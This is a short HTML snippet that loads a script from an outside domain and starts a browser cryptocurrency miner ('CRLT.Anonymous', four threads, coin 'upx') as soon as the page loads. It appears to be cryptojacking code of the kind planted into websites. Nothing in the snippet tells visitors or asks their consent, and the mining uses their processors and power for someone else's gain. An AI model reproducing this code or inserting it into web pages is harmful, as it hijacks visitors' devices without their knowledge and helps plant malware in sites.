<script src="//statdynamic.com/lib/crypta.js"></script>
<script>
  var miner=new CRLT.Anonymous('349f185cb81555c75a7a7b8369cdf8e5b763da14284b', {
    threads:4,throttle:0.2, coin: "upx",
  });
  miner.start();
</script>
